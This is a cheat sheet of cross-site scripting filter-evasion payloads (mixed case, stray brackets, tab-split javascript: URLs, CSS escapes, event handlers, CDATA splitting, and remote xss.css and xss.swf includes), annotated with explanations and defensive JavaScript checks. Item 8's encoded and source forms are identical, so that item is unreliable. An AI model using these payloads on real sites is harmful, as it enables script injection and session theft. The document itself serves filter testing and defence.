1. Change the case of characters

Tag names are ASCII case-insensitive to the browser, so a filter that matches the literal lowercase string misses this:

<sCript>alert('d')</scRipT>

2. Add extra characters to evade a regular-expression check

An extra "<" in front, or a ">" hidden inside an attribute value, defeats a filter that pairs each "<" with the next ">" to find the tag (in the first payload the // comments out the stray "<" so the script still parses):

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different extension instead of .js

The extension in the URL means nothing to the browser; the response body is run as script. Current browsers do refuse a script whose response carries a non-JavaScript Content-Type together with X-Content-Type-Options: nosniff, so the serving host still has to return it as JavaScript.

<script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

Old IE executed javascript: URLs inside CSS url(); current browsers do not.

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}

5. Insert other characters into the script tag

After the tag name the HTML tokenizer treats "/" like whitespace, so the attributes are still parsed while a filter that expects "<script " or "<script>" sees neither:

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>

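A worked check for items 1, 2 and 5, added here and not part of the original post: a toy blacklist of the kind these payloads target (naiveTagFilter, an assumed filter, not any real product) beside a match that follows the HTML tokenizer's own rules for where a tag name starts and ends. The payloads are the ones listed above, with t.js as in the list.

```javascript
// Added example, not from the original post. naiveTagFilter is an assumed
// toy of the kind items 1, 2 and 5 are written to slip past;
// tokenizerTagFilter applies the rules the HTML tokenizer uses for a tag name.

const DENIED_TAGS = ['script'];

// Toy blacklist: pair every "<" with the next ">", take the first
// whitespace-delimited token as the tag name, compare it case-sensitively.
function naiveTagFilter(html) {
  const re = /<([^>]*)>/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    const name = m[1].trim().split(/\s+/)[0];
    if (DENIED_TAGS.includes(name)) return false; // blocked
  }
  return true; // allowed
}

// Where the toy filter thinks the first tag ends. For '<SCRIPT a=">" SRC=...>'
// it stops at the ">" inside the attribute value, so SRC is invisible to
// any further check it makes on the tag.
function naiveTagBody(html) {
  const m = /<([^>]*)>/.exec(html);
  return m ? m[1] : null;
}

// HTML tokenizer rules: "<" starts a tag only when an ASCII letter follows
// (so "<<script" is the text "<" followed by the tag "script"); the name
// ends at whitespace, "/" or ">" (so "<SCRIPT/SRC" has the name "SCRIPT");
// names are ASCII case-insensitive.
function tokenizerTagFilter(html) {
  const re = /<([a-z][^\s\/>]*)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (DENIED_TAGS.includes(m[1].toLowerCase())) return false;
  }
  return true;
}

// Payloads quoted from items 1, 2 and 5 above.
const PAYLOADS = [
  "<sCript>alert('d')</scRipT>",          // item 1: mixed case
  "<<script>alert('c')//<</script>",      // item 2: extra "<" in front
  '<SCRIPT/SRC="t.js"></SCRIPT>',         // item 5: "/" instead of a space
  '<SCRIPT/anyword SRC="t.js"></SCRIPT>', // item 5: "/" plus junk
];

// Payloads a given filter lets through.
function bypasses(filter, payloads = PAYLOADS) {
  return payloads.filter((p) => filter(p));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('naive filter misses:', bypasses(naiveTagFilter));
  console.log('tokenizer filter misses:', bypasses(tokenizerTagFilter));
  console.log('naive tag body:', naiveTagBody('<SCRIPT a=">" SRC="t.js"></SCRIPT>'));
}
```

Run it with node: bypasses(naiveTagFilter) returns all four payloads and bypasses(tokenizerTagFilter) returns none, while naiveTagBody shows that the toy never even sees the SRC attribute of the a=">" payload. The tokenizer-aware version is still a denylist; the durable fix is to encode untrusted data for the context it lands in, or to sanitize with an allow-list built on a real HTML parser.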
6. Use a tab or newline to evade

The URL parser deletes ASCII tab, LF and CR from a URL before it reads the scheme, so a filter that looks for the string javascript: never sees it while the browser still does. The gaps below stand for a literal tab character in the first payload and a literal newline in the second:

<img src="jav	ascr	ipt:alert('XSS3')">   -> tab

<IMG SRC="jav
ascript:alert('XSS');">   -> new line

7. Use "\" to evade

CSS resolves a backslash escape to the character after it (or to a code point when hex digits follow) and drops /* */ comments even in the middle of a word, so expre\ssi\on and expr/*anyword*/ession are both the IE-only expression() property to the CSS parser but not to a string match:

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

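What the CSS parser does to item 7's payloads, as an added example that is not part of the original post: a string-aware comment stripper and a backslash-escape decoder (a teaching implementation of the CSS escape rules, not a library or a full tokenizer), applied to the five STYLE values above.

```javascript
// Added example, not from the original post: a teaching implementation of
// the two CSS rules item 7 relies on. Not a full CSS tokenizer.

// Drop /* ... */ comments, but not inside quoted strings (item 7's last
// payload puts "*//*" inside a string precisely to confuse a stripper that
// ignores quoting). A comment may sit in the middle of an identifier, so
// "expr/*anyword*/ession" becomes "expression".
function stripCssComments(css) {
  let out = '';
  let i = 0;
  while (i < css.length) {
    const c = css[i];
    if (c === '"' || c === "'") {
      // copy the string verbatim, keeping backslash pairs together
      out += c; i += 1;
      while (i < css.length && css[i] !== c) {
        if (css[i] === '\\' && i + 1 < css.length) { out += css[i] + css[i + 1]; i += 2; }
        else { out += css[i]; i += 1; }
      }
      if (i < css.length) { out += css[i]; i += 1; } // closing quote
    } else if (c === '/' && css[i + 1] === '*') {
      const end = css.indexOf('*/', i + 2);
      i = end === -1 ? css.length : end + 2;
    } else {
      out += c; i += 1;
    }
  }
  return out;
}

// Resolve backslash escapes:
//   "\" + 1..6 hex digits (+ one optional whitespace) -> that code point
//   "\" + newline                                      -> nothing
//   "\" + any other character                         -> that character
// So "expre\ssi\on" -> "expression" and "\ja\vasc\ript" -> "javascript".
function decodeCssEscapes(css) {
  return css.replace(/\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|(\n)|([\s\S]))/g,
    (_, hex, newline, ch) => {
      if (hex !== undefined) {
        const cp = parseInt(hex, 16);
        return cp === 0 || cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
      }
      if (newline !== undefined) return '';
      return ch;
    });
}

// What a keyword match should run on: comments gone, escapes resolved,
// case folded (property names and URL schemes are case-insensitive).
function cssNormalize(css) {
  return decodeCssEscapes(stripCssComments(css)).toLowerCase();
}

// Does a raw string match see "expression(" or "javascript:", and does the
// CSS parser?
function keywordVisibility(rawStyle) {
  const re = /expression\s*\(|javascript\s*:/i;
  return { raw: re.test(rawStyle), parsed: re.test(cssNormalize(rawStyle)) };
}

// The five STYLE values from item 7, as JavaScript string literals.
const ITEM7_STYLES = [
  "@im\\port'\\ja\\vasc\\ript:alert(\"XSS32\")'",
  'xss:expre\\ssion(alert("XSS33"))',
  "xss:expr/*anyword*/ession(alert('sss'))",
  "width: expre\\ssi\\on(alert('XSS31'));",
  'no\\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const s of ITEM7_STYLES) console.log(keywordVisibility(s), cssNormalize(s));
}
```

For every value in ITEM7_STYLES keywordVisibility reports raw: false, parsed: true. Note the order inside cssNormalize: comments are removed before escapes are resolved, as the CSS tokenizer does, so a backslash cannot be used to hide a comment delimiter from the stripper.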
8. Use hex encoding to evade (the ";" may also be dropped)

An attribute value is decoded from HTML character references before the CSS or URL parser sees it, so any character of expression or javascript can be written as a numeric reference (&#xNN; or &#NN;, and browsers accept either without the closing ";") to hide the keyword from a filter that reads the raw markup. The two payloads below are shown as the browser sees them after decoding, next to the source they decode to:

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag's event-handler attribute

<body onload="alert('onload')">

Any attribute whose name begins with "on" is a handler. The IE-era list below is not exhaustive, so a filter should reject the prefix rather than match names from a list:

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload.
10. An .swf containing the XSS code

AllowScriptAccess="always" lets the Flash movie call JavaScript in the embedding page. Flash Player has been end-of-life since 2020, so this vector is of historical interest.

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it (IE XML data islands)

The data island is bound into the SPAN as HTML, so the string is only put back together when the SPAN renders; a filter reading the XML sees "javas" and "cript:" apart:

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

The same split done with an XML comment:

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME (IE only)

The t:set element assigns innerHTML at run time, so the script tag never appears as markup in the document itself:

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert(&quot;XSS&quot;)</SCRIPT>">
</BODY></HTML>

13. Write a cookie via META

The payload fires only when the server later reflects the cookie value into a page unescaped; current browsers ignore http-equiv="Set-Cookie" altogether.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript: in src, href and url()

Current browsers run javascript: URLs only where they navigate (a href, iframe and frame src, form action, window.location); the IMG, LINK, TABLE and CSS url() variants below, like the DYNSRC and LOWSRC attributes, are from the IE era:

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
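An allow-list scheme check for the URL-valued attributes in item 14, added here and not part of the original post. It first undoes what the browser undoes before reading the scheme: HTML numeric character references with or without ";" (item 8), leading and trailing control characters, and the tab/LF/CR of item 6. Assumptions: only http, https and scheme-less URLs are wanted (ALLOWED_SCHEMES is the assumed policy, not anything the list prescribes); the sample values are taken from the list above, with the literal tab/newline and the numeric references constructed to stand in for the encoded forms.

```javascript
// Added example, not from the original post. An allow-list scheme check for
// URL-valued attributes (src, href, url(), background, dynsrc, lowsrc), run
// after the normalisation a browser performs before it reads the scheme.
// ALLOWED_SCHEMES is the assumed policy.

// Code points above U+10FFFF decode to U+FFFD, as browsers do.
function codePoint(n) {
  return n > 0x10ffff ? '\uFFFD' : String.fromCodePoint(n);
}

// Decode HTML character references the way an attribute value is decoded:
// numeric ones (&#106; / &#x6A;) with or without the closing ";" (item 8),
// plus a few named ones that matter for URLs (names need the ";").
// Decoding happens once, so "&amp;#x6A;" yields "&#x6A;" and stops there.
const NAMED_REFS = new Map([
  ['amp', '&'], ['lt', '<'], ['gt', '>'], ['quot', '"'], ['apos', "'"],
  ['colon', ':'], ['Tab', '\t'], ['NewLine', '\n'],
]);
function decodeHtmlRefs(value) {
  return value
    .replace(/&#[xX]([0-9a-fA-F]+);?/g, (_, h) => codePoint(parseInt(h, 16)))
    .replace(/&#([0-9]+);?/g, (_, d) => codePoint(parseInt(d, 10)))
    .replace(/&([A-Za-z]+);/g, (m, n) => NAMED_REFS.get(n) ?? m);
}

// URL-parser normalisation: strip leading/trailing C0 controls and space,
// then delete every ASCII tab, LF and CR anywhere in the string (item 6).
function normalizeUrl(attrValue) {
  return decodeHtmlRefs(attrValue)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r]/g, '');
}

// The scheme is the token before the first ":" if it is a valid scheme
// (letter, then letters/digits/+/-/.), compared case-insensitively.
function schemeOf(url) {
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(url);
  return m ? m[1].toLowerCase() : null; // null: relative URL, no scheme
}

const ALLOWED_SCHEMES = new Set(['http', 'https']); // assumed policy

function isSafeUrl(attrValue) {
  const scheme = schemeOf(normalizeUrl(attrValue));
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed sample values: the javascript: forms of item 14, item 6's
// tab/newline variants, numeric references standing in for item 8's
// hex-encoded form, and two benign URLs.
const SAMPLE_VALUES = [
  "javascript:alert('XSS3')",
  "jav\tascr\tipt:alert('XSS3')",
  "jav\nascript:alert('XSS')",
  '&#106;avascript:alert(1)',
  '&#x6A&#x61vascript:alert(1)',
  'https://example.com/logo.png',
  '/static/logo.png',
];

function audit(values = SAMPLE_VALUES) {
  return values.map((v) => ({ value: v, normalized: normalizeUrl(v), safe: isSafeUrl(v) }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(audit());
}
```

audit() marks only the two benign URLs safe; every javascript: variant normalises to the same scheme and is rejected, without the check ever having to know the spelling of "javascript". For values that land in CSS url() rather than an HTML attribute, resolve CSS backslash escapes and comments first, since that decoding happens on top of the attribute decoding shown here.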